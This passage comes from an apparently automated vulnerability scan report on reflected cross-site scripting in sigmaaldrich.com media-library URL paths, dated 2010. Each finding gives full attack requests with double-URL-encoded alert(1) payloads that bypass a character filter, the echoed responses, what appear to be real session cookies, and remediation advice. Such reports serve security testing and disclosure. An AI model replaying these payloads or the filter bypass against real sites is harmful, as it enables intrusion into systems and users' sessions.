WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:43 GMT
Content-Length: 28960
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib83254";alert(1)//cf3dc4590d/labware/labware-icons/air-sensitive-handling","E404") ;
   </script>
...[SNIP]...

1.335. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/air-sensitive-handling [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/air-sensitive-handling

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3441b%2522%253balert%25281%2529%252f%252f3d148b50841 was submitted in the REST URL parameter 3. This input was echoed as 3441b";alert(1)//3d148b50841 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 3 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware3441b%2522%253balert%25281%2529%252f%252f3d148b50841/labware-icons/air-sensitive-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:45 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware3441b";alert(1)//3d148b50841/labware-icons/air-sensitive-handling","E404") ;
   </script>
...[SNIP]...

1.336. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/air-sensitive-handling [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/air-sensitive-handling

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ffccd%2522%253balert%25281%2529%252f%252fa87587f8c89 was submitted in the REST URL parameter 4. This input was echoed as ffccd";alert(1)//a87587f8c89 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 4 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-iconsffccd%2522%253balert%25281%2529%252f%252fa87587f8c89/air-sensitive-handling HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: stlwcmprd01.sial.com:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:47 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-iconsffccd";alert(1)//a87587f8c89/air-sensitive-handling","E404") ;
   </script>
...[SNIP]...

1.337. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/air-sensitive-handling [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/air-sensitive-handling

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ead0d%2522%253balert%25281%2529%252f%252f315147b4a04 was submitted in the REST URL parameter 5. This input was echoed as ead0d";alert(1)//315147b4a04 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 5 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib/labware/labware-icons/air-sensitive-handlingead0d%2522%253balert%25281%2529%252f%252f315147b4a04 HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:06:49 GMT
Content-Length: 28961
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc/medialib/labware/labware-icons/air-sensitive-handlingead0d";alert(1)//315147b4a04","E404") ;
   </script>
...[SNIP]...

1.338. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/books-and-software [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/books-and-software

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 877c0%2522%253balert%25281%2529%252f%252f2f4ff129287 was submitted in the REST URL parameter 1. This input was echoed as 877c0";alert(1)//2f4ff129287 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc877c0%2522%253balert%25281%2529%252f%252f2f4ff129287/medialib/labware/labware-icons/books-and-software HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
bn_ec=%7B%22a%22%3A%22c%22%2C%22c%22%3A%22d%26g%26s%22%2C%22d%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fcustomer-service%2Fservices.html%22%2C%22r%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Ftechnical-service-home%2Fproduct-catalog.html%22%2C%22t%22%3A1289930598312%2C%22u%22%3A%226923287736776754713%22%2C%22dd%22%3A%22http%3A%2F%2Fwww.sigmaaldrich.com%2Fconfigurator%2Fservlet%2FDesignCenter%22%2C%22l%22%3A%22Custom%20Products%22%2C%22de%22%3A%7B%22ti%22%3A%22Services%20%7C%20Sigma-Aldrich%C2%AE%20Corporation%22%2C%22nw%22%3A344%2C%22nl%22%3A92%7D%7D; bn_u=6923287736776754713; cmTPSet=Y; WC_ACTIVEPOINTER=%2d1%2c11001;

Response (redirected)

HTTP/1.1 404 Not Found
Server: IBM_HTTP_Server/6.0.2.41 Apache/2.0.47 (Unix) Communique/4.0.2 mod_jk/1.2.28
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR CURa ADMa DEVa PSAo PSDo CONi TELi OUR DELa BUS IND PHY ONL UNI PUR COM NAV DEM STA"
Host: 141.247.173.160:4402
Content-Type: text/html; charset=utf-8
Date: Tue, 16 Nov 2010 18:07:01 GMT
Content-Length: 28957
Connection: close
Set-Cookie: JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76;Path=/


                <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns=
...[SNIP]...
<script language="JavaScript1.1">
       cmCreateErrorTag("Error 404 | http://www.sigmaaldrich.com:4402/etc877c0";alert(1)//2f4ff129287/medialib/labware/labware-icons/books-and-software","E404") ;
   </script>
...[SNIP]...

1.339. http://www.sigmaaldrich.com/etc/medialib/labware/labware-icons/books-and-software [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.sigmaaldrich.com
Path:   /etc/medialib/labware/labware-icons/books-and-software

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 82d37%2522%253balert%25281%2529%252f%252fc015318ee36 was submitted in the REST URL parameter 2. This input was echoed as 82d37";alert(1)//c015318ee36 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /etc/medialib82d37%2522%253balert%25281%2529%252f%252fc015318ee36/labware/labware-icons/books-and-software HTTP/1.1
Host: www.sigmaaldrich.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WC_USERACTIVITY_12688283=12688283%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZN%2bsQB36I3vUmE4Rx7cst5Zb7eFAVVKZZbU8Q6NXWL2ma01C4z8eXRe8KP%2b8%2fxa11nRsxJK9NLMS%0aryTTanv1yPfnuJk3YsswgrT6USqlqw1nF07uqQKEKFEfK8DyMuTvKLsQRZeesWLYgzw7OyiE9A%3d%3d; JSESSIONID2=0000CagITBFY3-vqdi-sO6cxLUa:12htm1uod; WC_USERACTIVITY_12688281=12688281%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c0iTkD05%2bJ%2fKBmcBh6LsH5XNZ0XmeCJHsSEZeUo2jUAh2B3dd%2fmMHH6p7Nw5FcdMZw339ce%2fd1dZs%0a0m3CH%2b4x2yWxyX56lBqUnCPe8iiIEgs4vnASJr6ngEo%2f%2fQiIWZNJeammXJARpeTHfZXS3dnk9A%3d%3d; JSESSIONID=2b64aecc-66a4-7744-8437-5741d83aae76; cmRS=t3=1289930598515&pi=/customer-service/services.html; fsr.s={"cp":{"COUNTRY":"USA","REGION":"USA","ClientId":"CagITBFY3-vqdi-sO6cxLUa","MemberId":"12688283","SiteId":"SA"},"v":1,"rid":"1289930575583_437774","pv":5,"to":2.6,"c":"http://www.sigmaaldrich.com/customer-service/services.html","lc":{"d0":{"v":5,"s":true}},"cd":0,"sd":0,"f":1289930598515}; WC_AUTHENTICATION_12688283=12688283%2cOm93j7omM3TWI7o%2fgJL9qiznixo%3d; WC_USERACTIVITY_12688282=12688282%2c11001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2c%2fDyB5eRHFA%2bjiqW4fJvzmKPtEcdXrV5ecHNw0Pgsx1dermxT7hun4Mp5L3tbS6qXEv%2bxu6VVuMsn%0ajem5P%2fgEKwOWIyMEiDRVS9%2bU3VER9BLZ3uDGRWY6GwmgFhDMc1XWItVfh6cs1hfOmNKlRwB8Cg%3d%3d; WC_AUTHENTICATION_12688282=12688282%2cn%2fwS3RmSOP4z5mMk9PYuUs6D%2bw8%3d; WC_AUTHENTICATION_12688281=12688281%2cPqNUHeCIPVUUoZVrbxhzbEz1zkE%3d; WC_SESSION_ESTABLISHED=true; fsr.a=1289930606627; ClientId=CagITBFY3-vqdi-sO6cxLUa; country=USA; SialLocaleDef=WebLang~-1|CountryCode~US|; 
